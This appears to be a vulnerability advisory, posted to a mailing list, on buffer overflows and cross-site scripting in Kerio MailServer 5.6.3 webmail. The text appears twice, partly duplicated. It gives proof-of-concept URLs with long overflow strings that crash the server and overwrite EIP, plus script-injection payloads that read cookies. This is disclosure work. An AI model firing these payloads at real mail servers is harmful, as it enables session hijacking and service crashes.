Multiple buffer overflows and XSS in Kerio MailServer
Version affected
5.6.3 ( last in kerio website )
Vendor status :
Vendor was notified
Description :
Kerio develop a mail server with support for Imap , Pop3, Smtp and SSL
protocols . Besides , it includes a webmail . This webmail is vulnerable
to basic cross site scriting attacks and buffer overflows that can lead to
a session hijacking or executing code with system privileges .
do_subscribe module
A long user name causes a total stack corruption and an access violation .
Three bytes of a thread instruction pointer EIP are overwriten with our
user name supplied , thus making easy to execute code
Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[server]/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>
alert(document.cookie);</script>
If we set as folder ~admin@localhost/INBOX and click it the mail server
will stop with an access violation .
Besides , add_acl module is affected as well by the problem of long user
names
Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(docum
ent.cookie);</script>&folder=public&user=lucascavadora
Besides is vulnerable when using long user names
For these buffer overflows to be exploitable you need an account in the
webmail , but an intruder can build a link with code to execute and wait
for the click of a user with an open session in Kerio mailserver .
You can find a spanish version of this advisory at
Multiple buffer overflows and XSS in Kerio MailServer
Version affected
5.6.3 ( last in kerio website )
Vendor status :
Vendor was notified
Description :
Kerio develop a mail server with support for Imap , Pop3, Smtp and SSL
protocols . Besides , it includes a webmail . This webmail is vulnerable
to basic cross site scriting attacks and buffer overflows that can lead to
a session hijacking or executing code with system privileges .
do_subscribe module
A long user name causes a total stack corruption and an access violation .
Three bytes of a thread instruction pointer EIP are overwriten with our
user name supplied , thus making easy to execute code
http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA
AAAAA
add_acl module
Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[server]/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>
alert(document.cookie);</script>
If we set as folder ~admin@localhost/INBOX and click it the mail server
will stop with an access violation .
Besides , add_acl module is affected as well by the problem of long user
names
http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA
@localhost/INBOX&add_name=lucas
The crash ocurrs in the same way , sign that is the same function what is
causing the error .
list module
http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA
@localhost/INBOX
The same buffer overflow .
do_map module
Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(docum
ent.cookie);</script>&folder=public&user=lucascavadora
Besides is vulnerable when using long user names
http://[Server]/do_map?
action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
For these buffer overflows to be exploitable you need an account in the
webmail , but an intruder can build a link with code to execute and wait
for the click of a user with an open session in Kerio mailserver .
You can find a spanish version of this advisory at
http://nautopia.org/vulnerabilidades/kerio_mailserver.htm
--
Regards ,
David F. Madrid
Madrid , Spain
[ reply ]